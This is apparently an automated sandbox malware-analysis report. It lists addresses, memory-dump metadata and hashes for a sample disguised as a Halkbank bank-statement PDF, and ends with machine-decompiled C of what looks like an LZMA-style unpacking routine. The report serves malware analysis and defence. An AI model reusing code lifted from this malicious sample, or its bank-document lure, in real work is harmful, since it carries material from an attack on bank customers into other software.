                                                      0x00406c70
                                                      0x00406c76
                                                      0x00406c78
                                                      0x00406c7b
                                                      0x00000000
                                                      0x00406c81
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c9e
                                                      0x00406c9e
                                                      0x00406ca2
                                                      0x0040754e
                                                      0x00000000
                                                      0x0040754e
                                                      0x00406cab
                                                      0x00406cbb
                                                      0x00406cbe
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc4
                                                      0x00406cc4
                                                      0x00406cc8
                                                      0x00000000
                                                      0x00000000
                                                      0x00406cca
                                                      0x00406ccd
                                                      0x00406cd0
                                                      0x00406cfa
                                                      0x00406d00
                                                      0x00406d07
                                                      0x00000000
                                                      0x00406d07
                                                      0x00406cd2
                                                      0x00406cd6
                                                      0x00406cd9
                                                      0x00406cde
                                                      0x00406cde
                                                      0x00406ce9
                                                      0x00406cef
                                                      0x00406cf1
                                                      0x00406cf4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d39
                                                      0x00406d3f
                                                      0x00406d42
                                                      0x00406d4f
                                                      0x00406d57
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d0e
                                                      0x00406d0e
                                                      0x00406d12
                                                      0x0040755d
                                                      0x00000000
                                                      0x0040755d
                                                      0x00406d1e
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d2c
                                                      0x00406d2f
                                                      0x00406d32
                                                      0x00406d35
                                                      0x00406d37
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073d4
                                                      0x004073da
                                                      0x004073dd
                                                      0x004073e0
                                                      0x004073fa
                                                      0x004073fd
                                                      0x00407403
                                                      0x0040740e
                                                      0x0040740e
                                                      0x00407410
                                                      0x004073e2
                                                      0x004073e2
                                                      0x004073f1
                                                      0x004073f5
                                                      0x004073f5
                                                      0x00407413
                                                      0x0040741a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040741c
                                                      0x0040741c
                                                      0x00407420
                                                      0x004075cf
                                                      0x00000000
                                                      0x004075cf
                                                      0x0040742c
                                                      0x00407433
                                                      0x0040743b
                                                      0x0040743b
                                                      0x0040743b
                                                      0x0040743e
                                                      0x00407441
                                                      0x00407441
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d5f
                                                      0x00406d61
                                                      0x00406d64
                                                      0x00406dd5
                                                      0x00406dd8
                                                      0x00406ddb
                                                      0x00406de2
                                                      0x00406dec
                                                      0x00000000
                                                      0x00406dec
                                                      0x00406d66
                                                      0x00406d6a
                                                      0x00406d6d
                                                      0x00406d6f
                                                      0x00406d72
                                                      0x00406d75
                                                      0x00406d77
                                                      0x00406d7a
                                                      0x00406d7c
                                                      0x00406d81
                                                      0x00406d84
                                                      0x00406d87
                                                      0x00406d8b
                                                      0x00406d92
                                                      0x00406d95
                                                      0x00406d9c
                                                      0x00406da0
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406dac
                                                      0x00406daf
                                                      0x00406dcd
                                                      0x00406dcf
                                                      0x00000000
                                                      0x00406dcf
                                                      0x00406db1
                                                      0x00406db4
                                                      0x00406db7
                                                      0x00406dba
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbf
                                                      0x00406dc2
                                                      0x00406dc4
                                                      0x00406dc5
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ffe
                                                      0x00407002
                                                      0x00407020
                                                      0x00407023
                                                      0x0040702a
                                                      0x0040702d
                                                      0x00407030
                                                      0x00407033
                                                      0x00407036
                                                      0x00407039
                                                      0x0040703b
                                                      0x00407042
                                                      0x00407043
                                                      0x00407045
                                                      0x00407048
                                                      0x0040704b
                                                      0x0040704e
                                                      0x0040704e
                                                      0x00407053
                                                      0x00000000
                                                      0x00407053
                                                      0x00407004
                                                      0x00407007
                                                      0x0040700a
                                                      0x00407014
                                                      0x00000000
                                                      0x00000000
                                                      0x00407068
                                                      0x0040706c
                                                      0x0040708f
                                                      0x00407092
                                                      0x00407095
                                                      0x0040709f
                                                      0x0040706e
                                                      0x0040706e
                                                      0x00407071
                                                      0x00407074
                                                      0x00407077
                                                      0x00407084
                                                      0x00407087
                                                      0x00407087
                                                      0x00000000
                                                      0x00000000
                                                      0x004070ab
                                                      0x004070af
                                                      0x00000000
                                                      0x00000000
                                                      0x004070b5
                                                      0x004070b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004070bf
                                                      0x004070c1
                                                      0x004070c5
                                                      0x004070c5
                                                      0x004070c8
                                                      0x004070cc
                                                      0x00000000
                                                      0x00000000
                                                      0x0040711c
                                                      0x00407120
                                                      0x00407127
                                                      0x0040712a
                                                      0x0040712d
                                                      0x00407137
                                                      0x00000000
                                                      0x00407137
                                                      0x00407122
                                                      0x00000000
                                                      0x00000000
                                                      0x00407143
                                                      0x00407147
                                                      0x0040714e
                                                      0x00407151
                                                      0x00407154
                                                      0x00407149
                                                      0x00407149
                                                      0x00407149
                                                      0x00407157
                                                      0x0040715a
                                                      0x0040715d
                                                      0x0040715d
                                                      0x00407160
                                                      0x00407163
                                                      0x00407166
                                                      0x00407166
                                                      0x00407169
                                                      0x00407170
                                                      0x00407175
                                                      0x00000000
                                                      0x00000000
                                                      0x00407203
                                                      0x00407203
                                                      0x00407207
                                                      0x004075a5
                                                      0x00000000
                                                      0x004075a5
                                                      0x0040720d
                                                      0x00407210
                                                      0x00407213
                                                      0x00407217
                                                      0x0040721a
                                                      0x00407220
                                                      0x00407222
                                                      0x00407222
                                                      0x00407222
                                                      0x00407225
                                                      0x00407228
                                                      0x00000000
                                                      0x00000000
                                                      0x00406df8
                                                      0x00406df8
                                                      0x00406dfc
                                                      0x00407569
                                                      0x00000000
                                                      0x00407569
                                                      0x00406e02
                                                      0x00406e05
                                                      0x00406e08
                                                      0x00406e0c
                                                      0x00406e0f
                                                      0x00406e15
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e1a
                                                      0x00406e1d
                                                      0x00406e1d
                                                      0x00406e20
                                                      0x00406e23
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e29
                                                      0x00406e2f
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e35
                                                      0x00406e35
                                                      0x00406e39
                                                      0x00406e3c
                                                      0x00406e3f
                                                      0x00406e42
                                                      0x00406e45
                                                      0x00406e46
                                                      0x00406e49
                                                      0x00406e4b
                                                      0x00406e51
                                                      0x00406e54
                                                      0x00406e57
                                                      0x00406e5a
                                                      0x00406e5d
                                                      0x00406e60
                                                      0x00406e63
                                                      0x00406e7f
                                                      0x00406e82
                                                      0x00406e85
                                                      0x00406e88
                                                      0x00406e8f
                                                      0x00406e93
                                                      0x00406e95
                                                      0x00406e99
                                                      0x00406e65
                                                      0x00406e65
                                                      0x00406e69
                                                      0x00406e71
                                                      0x00406e76
                                                      0x00406e78
                                                      0x00406e7a
                                                      0x00406e7a
                                                      0x00406e9c
                                                      0x00406ea3
                                                      0x00406ea6
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eb1
                                                      0x00406eb1
                                                      0x00406eb5
                                                      0x00407575
                                                      0x00000000
                                                      0x00407575
                                                      0x00406ebb
                                                      0x00406ebe
                                                      0x00406ec1
                                                      0x00406ec5
                                                      0x00406ec8
                                                      0x00406ece
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed3
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ede
                                                      0x00406ee1
                                                      0x00406ee4
                                                      0x00406ee7
                                                      0x00406eea
                                                      0x00406eed
                                                      0x00406ef0
                                                      0x00406ef3
                                                      0x00406ef6
                                                      0x00406ef9
                                                      0x00406efc
                                                      0x00406f14
                                                      0x00406f17
                                                      0x00406f1a
                                                      0x00406f1d
                                                      0x00406f1d
                                                      0x00406f20
                                                      0x00406f24
                                                      0x00406f26
                                                      0x00406efe
                                                      0x00406efe
                                                      0x00406f06
                                                      0x00406f0b
                                                      0x00406f0d
                                                      0x00406f0f
                                                      0x00406f0f
                                                      0x00406f29
                                                      0x00406f30
                                                      0x00406f33
                                                      0x00000000
                                                      0x00406f35
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f33
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f75
                                                      0x00406f75
                                                      0x00406f79
                                                      0x00407581
                                                      0x00000000
                                                      0x00407581
                                                      0x00406f7f
                                                      0x00406f82
                                                      0x00406f85
                                                      0x00406f89
                                                      0x00406f8c
                                                      0x00406f92
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f97
                                                      0x00406f9a
                                                      0x00406f9a
                                                      0x00406fa0
                                                      0x00406f3e
                                                      0x00406f3e
                                                      0x00406f41
                                                      0x00000000
                                                      0x00406f41
                                                      0x00406fa2
                                                      0x00406fa2
                                                      0x00406fa5
                                                      0x00406fa8
                                                      0x00406fab
                                                      0x00406fae
                                                      0x00406fb1
                                                      0x00406fb4
                                                      0x00406fb7
                                                      0x00406fba
                                                      0x00406fbd
                                                      0x00406fc0
                                                      0x00406fd8
                                                      0x00406fdb
                                                      0x00406fde
                                                      0x00406fe1
                                                      0x00406fe1
                                                      0x00406fe4
                                                      0x00406fe8
                                                      0x00406fea
                                                      0x00406fc2
                                                      0x00406fc2
                                                      0x00406fca
                                                      0x00406fcf
                                                      0x00406fd1
                                                      0x00406fd3
                                                      0x00406fd3
                                                      0x00406fed
                                                      0x00406ff4
                                                      0x00406ff7
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407056
                                                      0x00407056
                                                      0x00407059
                                                      0x00000000
                                                      0x00000000
                                                      0x00407395
                                                      0x00407399
                                                      0x004073bb
                                                      0x004073be
                                                      0x004073c8
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a5
                                                      0x004073a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00407489
                                                      0x00407489
                                                      0x00000000
                                                      0x00407489
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
                                                      0x00407546
                                                      0x00000000
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407194
                                                      0x00407197
                                                      0x0040719a
                                                      0x0040719c
                                                      0x0040719e
                                                      0x0040719e
                                                      0x0040719f
                                                      0x004071a2
                                                      0x004071a9
                                                      0x004071ac
                                                      0x004071ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040749f
                                                      0x0040749f
                                                      0x004074a3
                                                      0x004075db
                                                      0x00000000
                                                      0x004075db
                                                      0x004074a9
                                                      0x004074ac
                                                      0x004074af
                                                      0x004074b3
                                                      0x004074b6
                                                      0x004074bc
                                                      0x004074be
                                                      0x004074be
                                                      0x004074be
                                                      0x004074c1
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c7
                                                      0x004074c7
                                                      0x004074cb
                                                      0x0040752b
                                                      0x0040752e
                                                      0x00407533
                                                      0x00407534
                                                      0x00407536
                                                      0x00407538
                                                      0x0040753b
                                                      0x00407447
                                                      0x00407447
                                                      0x00000000
                                                      0x00407447
                                                      0x004074cd
                                                      0x004074d3
                                                      0x004074d6
                                                      0x004074d9
                                                      0x004074dc
                                                      0x004074df
                                                      0x004074e2
                                                      0x004074e5
                                                      0x004074e8
                                                      0x004074eb
                                                      0x004074ee
                                                      0x00407507
                                                      0x0040750a
                                                      0x0040750d
                                                      0x00407510
                                                      0x00407514
                                                      0x00407516
                                                      0x00407516
                                                      0x00407517
                                                      0x0040751a
                                                      0x004074f0
                                                      0x004074f0
                                                      0x004074f8
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407502
                                                      0x00407502
                                                      0x0040751d
                                                      0x00407524
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x0040710a
                                                      0x0040710a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x0040710d
                                                      0x0040710d
                                                      0x00000000
                                                      0x0040710d
                                                      0x0040738e
                                                      0x004075c3
                                                      0x004075e5
                                                      0x004075eb
                                                      0x004075ed
                                                      0x004075f4
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x004075fa
                                                      0x004075fa
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                      • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                      • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                      • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
